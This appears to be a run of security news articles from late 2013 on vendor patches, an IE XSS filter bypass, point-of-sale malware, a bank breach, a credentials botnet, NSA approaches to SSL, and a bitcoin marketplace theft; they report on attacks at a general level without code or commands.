Siemens has patched a serious remotely exploitable vulnerability in its SINAMICS S/G ICS software that could enable an attacker to take arbitrary actions on a vulnerable installation without having to authenticate.
The vulnerability affects all versions of the Siemens SINAMICS S/G products with firmware versions earlier than 4.6.11. ICS-CERT, a pat of the Department of Homeland Security, said in an advisory that it is not aware of any public exploit attempts against this flaw, but that’s no reason to delay patching. An authentication bypass vulnerability for a product such as SINAMICS S/G, which is used to control the operations of drives in industrial facilities, could be a very useful tool for an attacker.
“Siemens has identified an authentication bypass vulnerability in the SINAMICS S/G product family. Siemens has produced a firmware update that mitigates this vulnerability and has tested the update to validate that it resolves the vulnerability. Exploitation of this vulnerability could allow an attacker to access administrative functions on the device without authentication,” the ICS-CERT advisory says.
“The affected product, SINAMICS S/G family, is used to control a variety of drives, especially in mechanical engineering and plant construction. In addition, SINAMICS S/G family interacts with motion controllers that are used to coordinate synchronous operations or complex technology functions.”
The vulnerability is considered quite easy to exploit, and Siemens said that organizations that are running vulnerable versions of the software should install the updated firmware, versions 4.6.11 and 4.7. The company also recommends that customers not provide public access to the SINAMICS interface over the network.
“As a general security measure Siemens strongly recommends to protect network access to the interface of SINAMICS S/G with appropriate mechanisms. It is advised to follow recommended security practices and to configure the environment according to operational guidelines in order to run the devices in a protected IT environment,” the Siemens advisory says.
Image from Flickr photos of Surber.
Microsoft will, next week, patch a zero-day vulnerability in its GDI+ graphics component being exploited in targeted attacks in the Middle East and Asia.
The zero day has sat unpatched since it was made public Nov. 5; Microsoft did release a FixIt tool as a temporary mitigation. The patch is one of 11 bulletins Microsoft said today it will release as part of its December 2013 Patch Tuesday security updates; five of the bulletins will be rated critical.
Microsoft did confirm, however, that a zero day in the NDProxy driver that manages the Microsoft Telephony API on Windows XP systems will not be patched. That zero day is also being exploited in the wild alongside a PDF exploit of a patched Adobe Reader flaw.
The GDI+ vulnerability is found in several versions of Windows and Office and enables an attacker to gain remote-code execution, but only on Windows Vista, Windows Server 2008, and Office 2003 through 2010. The vulnerability exists in the way the GDI+ component handles TIFF images. Microsoft said an attacker would have to entice a victim to preview or open a malicious TIFF attachment or visit a website hosting the exploit image.
Tuesday’s critical patches address remote code execution vulnerabilities in a number of Microsoft products, including not only Windows and Office, but Lync, Internet Explorer and Exchange. Vulnerabilities in SharePoint, Lync, SingnalR and ASP.NET are among those rated important by Microsoft. Those vulnerabilities are primarily privilege escalation issues as well as an information disclosure bug.
This will be the last scheduled release of security updates from Microsoft for the year. It looks like Tuesday’s updates will bring the 2013 count to 106 bulletins, up sharply from 83 last year, according to Qualys CTO Wolfgang Kandek. Microsoft had similar numbers of bulletins in 2011 (100) and 2010 (106).
“Regarding 0-days, Microsoft has consistently pointed out that the additional security toolkit EMET (Enhanced Mitigation Experience Toolkit) has been effective against all of the 0-day problems this year,” Kandek said. “We believe it is a proactive security measure that organizations should evaluate and consider as an additional layer in their defensive measures.”
The XP zero-day, meanwhile, will likely be left for the January 2014 Patch Tuesday updates. The vulnerability is a privilege escalation vulnerability and allows kernel access.
FireEye researchers said they found the exploit in the wild being used alongside a PDF-based exploit against a patched Adobe Reader vulnerability. Reader versions 9.5.4, 10.1.6, 11.0.02 and earlier on XP SP3 are affected, later versions are not, FireEye said, adding that this exploit gives a local user the ability to execute code in the kernel, such as install new software, manipulate data, or create new accounts. The exploit cannot be used remotely, the company said.
Microsoft recommended deleting the NDProxy.sys driver as a workaround; the mitigation, however, will impact TAPI operations.
“System administrators everywhere must have made Microsoft’s naughty list because this holiday ‘gift’ is clearly a lump of coal,” said Tyler Reguly, technical manager of security research and development at Tripwire. “Microsoft is wrapping up the 2013 patch season with anything that was laying around. Someone should tell Microsoft they forgot to include the kitchen sink.”
The pesky Dexter point-of-sale malware, discovered more than a year ago, remains active primarily in Russia, the Middle East and Southeast Asia, while its cousin Project Hook is finding similar success in the United States, prompting experts to sound an alarm as holiday commerce ramps up.
Researchers at Arbor Networks last month found two servers hosting the Windows-based malware, heralding newly active campaigns.
Dexter and Project Hook differ from more traditional point-of-sale attacks which rely on skimmers physically installed on endpoints, or phishing emails luring users on Windows machines hosting the PoS software. Instead, the malware is injected into files hosted on Windows servers before scraping credit card numbers as they’re entered via the PoS system.
Arbor Networks senior research analyst Curt Wilson said the two new Dexter servers were found in November; law enforcement as well as the Financial Services Information Sharing and Analysis Center (FS-ISAC) were informed. Wilson said during a two-week period when Arbor researchers were monitoring activity on the servers, they saw 533 infected endpoints call back to the command and control infrastructure.
“The way the attackers had the server set up, we saw credit card data posted to the site,” Wilson said. “The attackers were clearing the log files periodically, so there’s no telling how long these campaigns have been ongoing.”
Arbor identified three versions of Dexter: Stardust, which is likely the original version; Millenium; and Revelation. Revelation is likely the latest version and it is capable of moving stolen data not only over HTTP as previous versions, but also over FTP, a first for POS malware, Wilson said. Wilson added that Arbor researchers have not been able to determine how the initial infections are happening. The two command servers, he said, are no longer online.
Dexter was discovered more than a year ago and reported by researchers at Seculert, who reported at the time that campaigns were claiming victims at big retail operations, hotels and restaurants. At the time there were victims in 40 countries, most of those in the U.S. and the United Kingdom.
“Dexter is stealing the process list from the infected machine, while parsing memory dumps of specific POS software related processes, looking for Track 1 / Track 2 credit card data,” Seculert CTO Aviv Raff wrote in a blogpost last December. “This data will most likely be used by cybercriminals to clone credit cards that were used in the targeted POS system.”
Point-of-sale systems present hackers with a target-rich environment. The systems are often reachable online and are usually guarded with default or weak passwords that are child’s play for a brute force or dictionary attack. The last two Verizon Data Breach Investigations Reports have identified small retailers and hospitality providers as the primary victims in such opportunistic attacks because of limited security resources.
Wilson said some of the victimized machines were not dedicated PoS servers; one in particular was also hosting a physical security management system that ran access control and card reader software.
“The data being exfiltrated that we’ve seen suggests that the compromised machines are doubling up functions and running point of sale on a machine doing something else. PoS machines should be dedicated, locked down and have special policies applied to it,” Wilson said. “That’s a bad practice to pile so much on one system. An attacker with access to credit card data would also have access to anything else the management system has access too.”
Wilson said that the initial infections could be happening either via phishing emails luring victims to sites hosting Dexter or Project Hook, or the attackers are taking advantage of default credentials to access these systems remotely.
“With the holidays, there’s going to be more PoS activity and a higher volume of transactions. Now would be a good time to fortify security,” Wilson said. “The basics should cover this. There are IDS signatures written for this malware, and there are indicators of compromise floating around; basic antimalware should catch the process-injection techniques used here.”
Meanwhile, Ars Technica reported today the discovery of the first botnet targeting point-of-sale systems. A Los Angeles security company called IntelCrawler found the botnet which had infected close to 150 Subway sandwich shops stealing 146,000 credit card numbers.
An attack on the computer networks of banking giant JP Morgan Chase & Co. may have exposed sensitive information belonging to 465,000 prepaid cash-card holders, according to a Reuters report.
JP Morgan said the attack targeted Web servers handling its Ucard program in mid-September and that the company has since remedied the underlying flaws that led to the breach and contacted law enforcement. The bank admitted to Reuters that attackers pilfered “a small amount” of data, but that they believe no user Social Security numbers, dates of birth, or email addresses were taken.
Troublingly, the Reuters report indicates that the information potentially exposed was not encrypted at the time of the attack, though JP Morgan claims it generally does encrypt its customers’ personal information.
Company spokesperson Michael Fusco told Reuters that JP Morgan spent the months following the attack determining which customers may have been affected and which data may have been compromised. The company is contacting those customers. He reportedly declined to disclose any technical details of the attack.
The breach reportedly affected some two percent of JP Morgan’s 25 million UCard holders, according to Fusco. Corporations apparently buy UCards from JP Morgan and issue them as payments to their employees while government agencies use them to issue tax refunds and to pay unemployment and other benefits.
As is standard operating procedure at this point, the bank is offering three years of credit monitoring services to those affected.
In response to the growing set of revelations about the NSA’s surveillance methods and alleged compromise of some large technology vendors’ services, Microsoft is taking a number of steps to try and reassure customers about the integrity of the company’s offerings and to greatly expand the use of encryption across its services.
Microsoft said that in the next few months it will be improving and expanding its use of encryption, specifically in its cloud services such as Azure, Outlook.com and Office 365. The company recently announced that it would be improving the encryption services on Office 365, but this new initiative goes well beyond that effort. Microsoft will be implementing Perfect Forward Secrecy on its cloud service and also will be moving to 2048-bit keys. This applies to data in transit between customers and Microsoft’s servers, but it also will be applied to information moving among the company’s data centers.
Microsoft said that these new security measures will be in place by the end of 2014, and some of them are in effect right now. The company also will be encrypting customer data at rest in its data centers.
“Although this is a significant engineering effort given the large number of services we offer and the hundreds of millions of customers we serve, we’re committed to moving quickly. In fact, many of our services already benefit from strong encryption in all or part of the lifecycle. For example, Office 365 and Outlook.com customer content is already encrypted when traveling between customers and Microsoft, and most Office 365 workloads as well as Windows Azure storage are now encrypted in transit between our data centers. In other areas we’re accelerating plans to provide encryption,” Brad Smith, general counsel and executive vice president for legal and corporate affairs at Microsoft said.
Microsoft officials, like their counterparts at Google, Yahoo, Apple and other tech giants, have spent much of the last six months dealing with a number of allegations in media reports of the Edward Snowden NSA leaks. The most damaging reports have alleged that these companies have provided direct access to their servers for the NSA, something all of them have denied. Recent revelations have shown that the agency is actually tapping into undersea fiber cables that move generally unencrypted data between data centers around the world. This revelation has angered engineers at Google and led the company to accelerate some of its existing plans to encrypt those data links.
While Microsoft’s moves to encrypt more customer data will provide better protection for customers, there is more that the company could be doing to give basic security to its millions of users, said Chris Soghoian, principal technologist at the American Civil Liberties Union. Soghoian has been urging Microsoft and other companies to turn on SSL by default on their Web properties for years and said that there a number of outstanding issues Microsoft needs to resolve to make these moves more significant.
“Bing still doesn’t offer SSL as an option. So will they finally change that? One of the things they said in this announcement is that they’ll be using best-in-class encryption, but that means more than just an algorithm. It means things like HSTS [HTTP Strict Transport Security] and certificate pinning,” he said. “Is Microsoft going to use certificate pinning in Internet Explorer?”
Certificate pinning allows browsers to define which certificate is associated with a specific Web property, as a defense against man-in-the-middle attacks that employ spoofed certificates. HSTS is a header that tells users’ clients that a given Web server only wants to accept secure connections.
In addition to the encryption changes, Microsoft also said it will be reinforcing the legal authorities that it uses to protect customer data that the company stores. The company notifies corporate and government customers when it receives a request for a customer’s data, and Smith said Microsoft will continue to do this in the future.
“Except in the most limited circumstances, we believe that government agencies can go directly to business customers or government customers for information or data about one of their employees – just as they did before these customers moved to the cloud – without undermining their investigation or national security. And when those limited circumstances arise, courts should have the opportunity to review the question and issue a decision,” Smith said.
But, Soghoian questioned why these same protections aren’t being extended to individual consumers whose data the government may seek.
“What about their regular customers? Forcing a gag order forces the government to go before a judge on something that they wouldn’t have to otherwise,” he said. “It’s really helpful to force the issue before an independent third party.”
Smith said Microsoft also plans to open so-called transparency centers in several locations around the world to enable government customers to inspect Microsoft’s source code for backdoors. The company has been allowing limited access to its source code for several years now, but will be expanding that in the near future.
“We’re therefore taking additional steps to increase transparency by building on our long-standing program that provides government customers with an appropriate ability to review our source code, reassure themselves of its integrity, and confirm there are no back doors. We will open a network of transparency centers that will provide these customers with even greater ability to assure themselves of the integrity of Microsoft’s products,” Smith said.
UPDATE – A weakness has been discovered in the reflective cross-site scripting filter present in Internet Explorer since IE 8 that could enable an attacker to trick the browser into executing malicious code as trusted. The problem going forward is twofold: everything occurring in the bypass method is accepted as part of the official HTML standard going back at least 15 years; and Microsoft said it will not work on a fix for the flaw.
Carlos Munoz, a researcher with WhiteHat Security who publicized the issue today, told Threatpost that he reported the problem to the Microsoft Security Response Center on Aug. 26 and after several back-and-forth emails was informed that Microsoft would not move forward citing its design philosophy for the XSS filter.
A Microsoft spokesperson told Threatpost that the filter was designed with the goal of raising the cost of an attack.
“As such, and after thorough investigation, this is not a product vulnerability,” the spokesperson said. “The scenario in question would require a cross-site scripting vulnerability to be present in a website and would also require a user to interact with such a site. We continue to recommend that customers exercise caution when accepting links from untrusted sources.”
In its email exchanges with Munoz, Microsoft pointed the researcher to a bullet point in its design philosophy that states: “For attacks that depend on application-specific transformations, we will only attempt to make the XSS Filter effective where these transformations are identified to be pervasive. We choose not to ROT13 decode URLs. ”
Munoz said that if Microsoft did choose to fix the problem, it may have to add functionality to the filter that recognizes encoded reflections, decodes them, and then compares those decodings to known potentially malicious signatures.
“Another path that Microsoft could take is tracking injections across several requests and attempting to determine if an injection on page 1 of a website eventually reflects as a malicious script on page 4,” Munoz said. “There are probably several other avenues that Microsoft could pursue in working on a fix for this flaw.”
Microsoft introduced the reflective cross-site scripting filter in Internet Explorer 8 and it’s been supported in every version of the browser through the current version 11 released two months ago with Windows 8.1. The filter prevents browsers from executing non-stored data submitted in an HTML form or in an HTTP query without sanitizing it first.
“Currently this method of bypassing Internet Explorer’s anti-XSS filter only works when an attacker can inject into or create their own attribute space of an HTML element, and that attribute is then passed onto a page within the same domain that contains a XSS vulnerability,” Munoz said. “As this would imply, this is not an ‘everything is vulnerable’ type of finding. It is, however, something that could be exploited on almost any page where an attacker can inject HTML elements, albeit with the requirement that the victim would need to click a link on the page.”
Munoz wrote in a blog post today that the filter compares only untrusted requests with the response body from a website for reflections that could cause code execution.
Munoz points out that the filter is effective at stopping cross-site scripting attacks, but an attacker could fool it by taking advantage of a loophole in the HTML standard with regard to decimal and hexadecimal encodings.
“Everything utilized in this methodology is part of the official HTML standard—it uses the web the way the web was meant to be used,” Munoz said. When a response is made to an HTTP request that includes a properly coded decimal or hexadecimal character, Munoz said, the browser will display the encoded character.
“As an added bonus for an attacker, when a decimal or hexadecimal encoded character is returned in an attribute that is then included in a subsequent request, it is the decoded character that is sent, not the decimal or hexadecimal encoding of that character,” Munoz wrote. “Thus, all an attacker needs to do is fool Internet Explorer’s anti-XSS filter by inducing some of the desired characters to be reflected as their decimal or hexadecimal encodings in an attribute.”
Munoz said such an attack can be carried out with a malicious iframe, malicious code in a form submission or an embedded link to a site hosting an exploit. He added that he is not aware of any in-the-wild exploits. An attacker could craft something similar to a common reflective XSS attack to bypass the filter, but would have to entice the user via a phishing email to land on a site hosting an exploit.
This article was updated Dec. 5 with a comment from a Microsoft spokesperson.
In an attempt to curb the rampancy of fraud throughout the holiday shopping season, a coalition of international law enforcement agencies seized 706 Internet domains allegedly involved in the sale of counterfeit merchandise.
The United States Homeland Security Investigations’ (HSI) National Intellectual Property Rights (IPR) Coordination Center spearheaded the operation along with Immigration and Customs Enforcement and ten law enforcement agencies from other countries and the European Union as well.
The campaign – dubbed Project Cyber Monday IV – is in its fourth year and is part of the ICE’s ongoing Operation in our Sites.
Among the domains seized, 297 were based in the U.S. and taken down by HSI, 393 were located inside the EU and taken down by Europol, and Hong Kong law enforcement took down 16 domains under its jurisdiction.
In a press release announcing the seizures on the ICE’s website, the agency claims that the last few weeks of the calendar year see online and physical marketplaces flooded with counterfeit goods. The negative impact of this, they claim, is two-fold: scammers are duping buyers with shoddy goods and consumers are putting their financial information at risk by purchasing from counterfeiters.
“Working with our international partners on operations like this shows the true global impact of IP crime,” said ICE Acting Director John Sandweg. “Counterfeiters take advantage of the holiday season and sell cheap fakes to unsuspecting consumers everywhere. Consumers need to protect themselves, their families, and their personal financial information from the criminal networks operating these bogus sites.”
The ICE didn’t mention it but, of course, counterfeit goods affect the bottom lines of businesses as well. In fact, the IRP center notes that the majority of the info they received leading to take downs came from the trademark holders that were being infringed upon.
The IPR center claims that the most commonly counterfeited goods are headphones, sports jerseys, personal care products, shoes, toys, luxury goods, cell phones, and electronic accessories. Law enforcement officials would buy these items undercover and verify that they were in fact counterfeits with the legitimate trademark and copyright holders before moving on domain seizures.
“This operation is another good example of how transatlantic law enforcement cooperation works. It sends a signal to criminals that they should not feel safe anywhere,” said Rob Wainwright, director of Europol. “Unfortunately the economic downturn has meant that disposable income has gone down, which may tempt more people to buy products for prices that are too good to be true. Consumers should realize that, by buying these products, they risk supporting organized crime.”
All of the domain names seized are under the control of the governments involved in the operation. Visitors to those sites will see a banner informing them of why the site has been taken offline and warning them that willful copyright infringement is a violation of federal law.
Virtualization software company VMware pushed out patches for some builds of its Workstation, Fusion, ESXi and ESX products this week, fixing a vulnerability that could have led to a privilege escalation in older Windows operating systems running in a virtual environment.
The main problem is the way that Workstation, ESX and Fusion handle control code in the LGTOSYNC.sys driver. If an attacker leveraged a vulnerability in that driver they could manipulate memory allocation and put users running the software on 32-bit systems running Windows 2000 Server, Windows XP or Windows 2003 at risk. ESXi is tangentially vulnerable if deployed on Windows 2000 Server, Windows XP or Windows 2003 Server.
“The vulnerability does not allow for privilege escalation from the Guest Operating System to the host,” VMware specified in an advisory yesterday, “This means that host memory can not be manipulated from the Guest Operating System.”
The security advisory adds that versions of Workstation from 9.x prior to 9.0.3, Player from 5.x prior to 5.0.3, Fusion from 5.x to 5.0.4, ESXi 4.0, 4.1, 5.0, 5.1 and ESX 4.0 and 4.1 are all affected.
All of the vulnerable products are more or less part of the company’s VMware infrastructure suite. VMware Fusion is technically referred to as a software hypervisor, allowing Intel-based Macs to run Windows, Linux and other operating systems alongside OS X while Workstation has the same functionality as Fusion, it’s just specialized for x64 computers running Windows, Linux or BSD.
It’s the second privilege escalation vulnerability patched by VMware in the past three weeks. The company also fixed a similar issue in Workstation, in particular the version that runs Linux, back in November.
VMware posted patches for all of the products implicated yesterday on the support section of its site and per usual, sent security notifications via email and in a post on Full Disclosure‘s lists.
Although there are still a number of issues that need to be addressed with the Department of Homeland Security’s information security efforts, the department is improving in many areas and making strong progress toward implementing better security controls, a new report from the Inspector General found.
DHS, which is responsible for a large portion of the security programs in the federal government, has been criticized sharply in the past for not meeting minimum standards on various basic security controls. The IG, as well as members of Congress, have taken the department to task for falling behind on requirements such as patching, implementing strong authentication and exerting better control of external systems. The latest report from the Office of the Inspector General shows that the department is moving in the right direction on many things, but still has plenty of room for improvement.
The report shows that some portions of DHS are running systems with authority to operate, haven’t consolidated all of their Internet connections into one trusted Internet connection and don’t have a formal process for tracking external systems.
“We identified a number of issues that DHS needs to address to strengthen its security posture. For example, we determined that components are not satisfying all of the Department’s information security policies, procedures, and practices. Specifically, we identified deficiencies in component POA&M [plan of action and milestones] management, system security authorization, and the consolidation of external network connections. In addition, components have not implemented all system configurations in accordance with DHS policies and procedures,” the new report says.
One major problem that the IG found in the DHS program, which has been ongoing for at least year, is the department’s lack of management program for tracking security vulnerabilities in its classified systems. The department uses a project management system to track progress on most such initiatives, but the IG found this wasn’t the case for vulnerabilities in classified systems.
“DHS does not monitor the adequacy of the POA&Ms for its ‘Top Secret’ systems. For example, DHS has yet to perform any reviews or oversight functions on ‘Top Secret’ POA&Ms that are manually tracked outside of the Department’s enterprise management tools. As a result, DHS cannot ensure that POA&Ms have been created to mitigate the security vulnerabilities identified on its ‘Top Secret’ systems and ensure they are managed in accordance with DHS’ policies and procedures,” the report says.
A second issue is that DHS doesn’t have baseline configurations enforced on its systems, both on the desktop and servers. The IG report found inconsistent implementation of the configurations and recommended that the department’s CIO ensure that this state of affairs changes. DHS management, commenting on the IG’s recommendations, said that it plans to have this problem addressed by the end of the year.
“During FY 2013, DHS completed major steps toward achieving this goal. There are 11 out of 12 Components now using the approved baseline configuration settings. The rigor of configuration management will be increased in FY 2014 by expanding relevant scorecard metrics to include devices beyond Windows platforms,” the comment said.
Overall, the IG report said that DHS is moving forward with its security programs and making strides toward hardening the department’s internal and external systems.
“DHS continues to improve and strengthen its information security program. During the past year, DHS drafted an ongoing authorization methodology to help improve the security of the Department’s information systems through a new risk management approach. This revised approach transitions the Department from a static, paperwork-driven, security authorization process to a dynamic framework that can provide security-related information on demand to make risk-based decisions based on frequent updates to security plans, security assessment reports, and hardware and software inventories,” the report says.
So what’s worse: Finding two million passwords harvested by a botnet, or learning that most of the stolen passwords are terribly weak?
Researchers at Trustwave found another Pony botnet controller recently that oversees a trove of close to two million website logins, email account credentials, as well as FTP, RDP and SSH accounts. Most of the account credentials found were for online services such as Facebook, Google, Twitter, Yahoo and LinkedIn, as well as close to 8,000 passwords for the ADP payroll service.
While the Facebook logins found inside this particular Pony instance are useful for social engineering capers, phishing scams and targeted attacks, the ADP logins are a link to cold hard cash.
“It is only natural to have such domains in the mix, but it is surprising to see it ranked #9 on the top domains list,” wrote Trustwave SpiderLabs researchers Daniel Chechik and Anat Davidi. “Facebook accounts are a nice catch for cyber criminals, but payroll services accounts could actually have direct financial repercussions.”
Pony is a botnet management interface that is a control panel that provides a view into infected victims, activity logs, management of stolen data and statistics on said data. Since the Pony controller source code was leaked earlier this year, researchers have been finding more of them online used to manage botnets big and small.
This particular instance discovered by SpiderLabs has a distinct Russian flavor to it given that a good number of credentials for a couple of popular Russian social networks were also discovered. Infected machines from more than 100 countries report in to this Pony controller, and while most of those connections come from the Netherlands according to the stats found by SpiderLabs, the researchers theorize that since the hits are coming from a single IP address, that it’s a gateway between the infected machines and the true command and control infrastructure, which is in the Netherlands.
“This technique of using a reverse proxy is commonly used by attackers in order to prevent the Command-and-Control server from being discovered and shut down—outgoing traffic from an infected machine only shows a connection to the proxy server, which is easily replaceable in case it is taken down,” Chechik and Davidi wrote. “While this behavior is interesting in-and-of itself, it does prevent us from learning more about the targeted countries in this attack, if there were any.”
While the theft of credentials is bad enough (318,121 Facebook credentials; 59,549 Yahoo; 54,437 Google), the researchers looked at the passwords themselves and perhaps not to anyone’s surprise, they’re generally weakly constructed credentials.
Hundreds of thousands of credentials, the researchers said, use only one character type—either numerals or letters—as a password. Most of those are built off the 123456 construct; seven of the top 10 passwords found via the controller started with 123. Password, admin and 111111 round out the top 10.
As for complexity, 34 percent were rated poor by SpiderLabs, meaning they used one character or a simple password, while 22 percent were rated good or excellent, meaning they used at least three different character types to build a password.
“Unfortunately, the most commonly used passwords were far from what your CISO would like to see,” they wrote.
In order for the National Security Agency to collect the massive amounts of communication it has from email and Web traffic, it needs to elude, leapfrog or bash through the barrier that is SSL.
How it’s doing so is the real question, one that noted Johns Hopkins cryptographer Matthew Green wants answered.
“If you really want to collect that kind of information, that means email and web traffic,” Green said. “Those are the most vulnerable things on the Internet and those are secured with SSL.”
Green published a lengthy essay yesterday that proposed a number of practical and elaborate scenarios explaining how SSL could be subverted or suborned. He also suggests that there’s no time like the present to get away from RSA keys and consider alternatives such as perfect forward secrecy and even Elliptic Curve Cryptography.
Some large Internet companies reportedly targeted by the NSA have already taken steps to either encrypt traffic by default, strengthen the keys they use to secure communication, or move away entirely from broken or weakened algorithms. Google, for example, has recently announced it has completed, ahead of schedule, an upgrade of its SSL certificates to 2048-bit RSA and Microsoft announced that it was advising developers to deprecate the RC4 algorithm and stop using the SHA-1 hash algorithm.
The moves are encouraging, but they’re initial steps toward keeping the NSA’s surveillance efforts at bay and securing the privacy of consumers and enterprises alike. Green, for one, says Perfect Forward Secrecy should be considered a minimum standard going forward.
“The other thing that we need to do is start moving away from RSA altogether. Right now there are a few companies such as Google, Facebook and Twitter that have all adopted Perfect Forward Secrecy, but people still view that as a luxury,” Green said. “I think that’s the basic, minimum requirement right now.”
Perfect Forward Secrecy eliminates the single point of failure presented by SSL keys by generating a unique key for every connection and then deleting it after the connection is shut down. Cryptography experts believe, despite the resource overhead it presents, that Perfect Forward Secrecy is the best option rather than the single 128- or 256-bit RSA key generated with each TLS RSA handshake that encrypts every past and future connection made from the device.
“It’s this one piece of information that every single piece of data that’s come over the wire is vulnerable to if that gets compromised. You can go back five years and decrypt what people sent five years ago,” Green said. “If it works right, you have one key, use it and you erase it.”
Modern browsers such as Internet Explorer, Chrome and Firefox already support Perfect Forward Secrecy, but this doesn’t help those users still on older versions of IE for example, a browser that is also a favorite of hackers in targeted attacks, and is still being patched almost monthly by Microsoft.
“The problem is when people are using IE 6 and 7, [those browsers don't] support this. You still have to support RSA; it just ends up being a mess,” Green said. “The good news is it can support people using modern browsers, but we’re never going to be able to help you if you’re using older browsers.”
Green’s essay, meanwhile, postulates several ways the NSA may actually be getting through SSL encryption today. Some of the known attacks don’t involve hacking at all, but rather the theory that the NSA could just be taking SSL keys from organizations, either through court orders or even coercion. Malware exploits are also a possibility, he said.
“The beauty is that these attacks don’t even require remote code execution. Given the right vulnerability, it may simply require a handful of malformed SSL requests to map the full contents of the OpenSSL/SChannel heap,” Green wrote.
The NSA, Green wrote, could also manage to sidestep SSL by working out a backroom deal with hardware encryption chip makers. A September expose by the New York Times on the Bullrun program said the NSA and Britain’s GCHQ have been in cahoots with chip makers to enable decryption on several leading VPN encryption chips.
“The NSA documents aren’t clear on how this capability works, or if it even involves SSL. If it does, the obvious guess is that each chip encrypts and exflitrates bits of the session key via ‘random’ fields such as IVs and handshake nonces. Indeed, this is relatively easy to implement on an opaque hardware device,” Green wrote. “The interesting question is how one ensures these backdoors can only be exploited by NSA — and not by rival intelligence agencies.”
Side-channel attacks are another option, though as Green said, an attacker would need physical proximity to a TLS server in order to siphon off data that might leaking; though with cloud computing implementations, this option is more viable than in the past.
Random number generators are another likely NSA target; RNGs are considered fragile and any number of factors could weaken them, Green said in his essay. Or the NSA could insert itself into the development process for one of these RNGs as it allegedly did with NIST in the development of the Dual-EC DRBG generator that is default in the widely used RSA BSAFE libraries.
And what about actually cracking RSA keys? Green says that while it’s difficult and a constant rumor that the NSA has indeed made some sort of cryptographic breakthrough, it’s not entirely out of reach. A decade ago, the cost was estimated at $10 million for one machine to factor a 1024-bit RSA key per year; Green said that cost has dropped to less than $1 million given Moore’s Law. Not to mention that a botnet-style distributed network could also do the trick.
“In principle, a cluster about the size of the real-life Conficker botnet could do serious violence to 1024-bit keys,” Green said, referring to research already conducted on this possibility.
“We don’t know and can’t know the answer to these things, and honestly it’ll make you crazy if you start thinking about it,” Green wrote. “All we can really do is take NSA/GCHQ at their word when they tell us that these capabilities are ‘extremely fragile’. That should at least give us hope.”
UPDATE: As if Bitcoin malware and Bitcoin mining malware weren’t enough to worry about, there was more trouble for the users of the digital crypto-currency last week as 96,000 Bitcoins disappeared from the Sheep Marketplace.
Bicoin’s value has surged in recent weeks, peaking at an astonishing $1,203 per coin last week before dropping back nearly $200 in value over the weekend. The Bitcoin exchange rate is climbing again and currently rests at $1,102 per coin, meaning that the value of the heist is currently $105,792,000.
To put that in a historical perspective – as far as popular heists go – the New York Times estimated in 2008 that cross-dressing thieves made off with roughly $105 million in the famous robbery of the Harry Winston jewelry store in Paris. According to a Wired article from 2009, Leonardo Notarbartolo made off with $100 million worth of loose diamonds, jewelry, and gold after robbing the Antwerp Diamond Center in Antwerp, Belgian in the early 2000s.
Certain reports without sources claim that the attackers managed to spoof user-interfaces so that member-accounts seemed to contain their correct balances. While it is not clear at the moment if this is true, user-interface spoofing is a common tactic among online bank account theft.
According to Tom Gorup, a security operation center (SOC) analyst at Rook Consulting, there are a number of factors that may have helped the attackers cover their tracks during and immediately following the attack.
For one, based on a description of the attack from the forum Bitcointalk.org, Gorup said it’s likely that the attackers hijacked the Sheep Marketplace’s domain name system (DNS) servers and routed incoming traffic through a set of servers under their control. Thus, the attackers could have displayed whichever content they liked to anyone attempting to access their account. Gorup said it’s probable that the thieves are operating a botnet, because as the robbery was ongoing, the service was experiencing a distributed denial of service attack. The DDoS attack would have the effect of knocking the Sheep Marketplace offline, making it impossible for the users to access and monitor their accounts.
Gorup told Threatpost that the most challenging aspect of the attack would have been finding an exploitable vulnerability in the vendor’s software. Once the attacker gained proper privileges via exploit, the process of actually stealing the Bitcoins, he said, is trivial.
Once an attacker has the money in hand, so to speak, another challenge presents itself: how do you use it without all your victims realizing? It would seem simple enough, given that Bitcoin is pseudo-anonymous, but, like all functional currencies, Bitcoin cannot be truly anonymous because there must be safeguards against double-spending.
This is where Bitcoin’s public ledger, the BlockChain comes into play. Every public transaction is recorded on the BlockChain. Therefore, the instant someone tries move a massive some of money, like 96,000 Bitcoins, from one wallet to another, the BlockChain will make record of that movement. More so, each Bitcoin is uniquely identifiable, creating another avenue for tracking the stolen digital crypto-currency.
It’s well known that Bitcoins are widely used to launder traditional currencies, but there are, of course, services for “cleaning” stolen Bitcoins as well. These services are called “tumblers.” Essentially, tumblers, like any money laundering service, take stolen Bitcoins or fractions of Bitcoins and re-distribute them with completely different fractions of completely different Bitcoins. Gorup notes that one downfall to tumbler services, from a criminal’s standpoint, is that many tumblers are replacing stolen Bitcoins with other stolen Bitcoins.
Both Gorup and a Reddit-thread dedicated to tracking the thief or thieves responsible for the theft indicate that it is still possible – albeit difficult – to use the BlockChain to track money going through tumblers.
Gorup noted that the vast scope of this theft is going to make it considerably more difficult for the attackers to tumble their newly acquired Bitcoins. However, he believes their botnet – if they do indeed have one – could make the process slightly easier.
“It can be safe to say that the attacker could have created a number of wallets distributed throughout his/her botnet in preparation for this attack and automated the exchange to distribute throughout these wallets,” Gorup told Threatpost. “Then potentially, if they felt it wasn’t clean enough already, utilize multiple tumbler services to further clean these coins. It would be complicated, but with proper preparation, like any decent attacker should do, this is probably close to how it was done.”
Initially, a New Statesman report indicates that the Sheep Marketplace’s administrators believed that an error by a third party vendor had caused a much smaller sum of money to go missing. It quickly became apparent that the amount lost was far greater.
Gorup claims that the drop in Bitcoin value over the weekend is not related to the theft:
“I think the drop wasn’t due to theft as the Sheep Marketplace theft took place five days prior to Bitcoins reaching an all-time high. I think it was a natural drop after a huge peak, just as this happens time to time in the stock exchange when everyone wants to capitalize on their investment. I wouldn’t be surprised to see one or two more surges like this before Bitcoin settles to a normal rate like any other traded material like gold or silver.”
Straight-up Bitcoin theft along with infections from Bitcoin mining malware and Bitcoin stealing malware are becoming daily occurrences. Recently published research suggested there are frailties within the underpinnings of the Bitcoin economy itself. Trouble isn’t likely to abate any time soon for digital crypto-currency, given that it is completely unregulated. That reality presents a number of very real problems, not the least of which is, how do you recover stolen coins? Users certainly won’t be repaid in civil or criminal suits. Not yet at least.
*A previous version of this story referred to the Sheep Marketplace as a Bitcoin exchange. A Bitcoin exchange is a place where Bitcoin holders can exchange their Bitcoins for traditional currency. Sheep Marketplace is an underground marketplace located within the Tor Hidden Services that caters to the sale of drugs, weapons, and other illicit goods.
UPDATE–The skies may soon be full of drones–some run by law enforcement agencies, others run by intelligence agencies and still others delivering novels and cases of diapers from Amazon. But a new project by a well-known hacker Samy Kamkar may give control of some drones to anyone with $400 and an hour of free time.
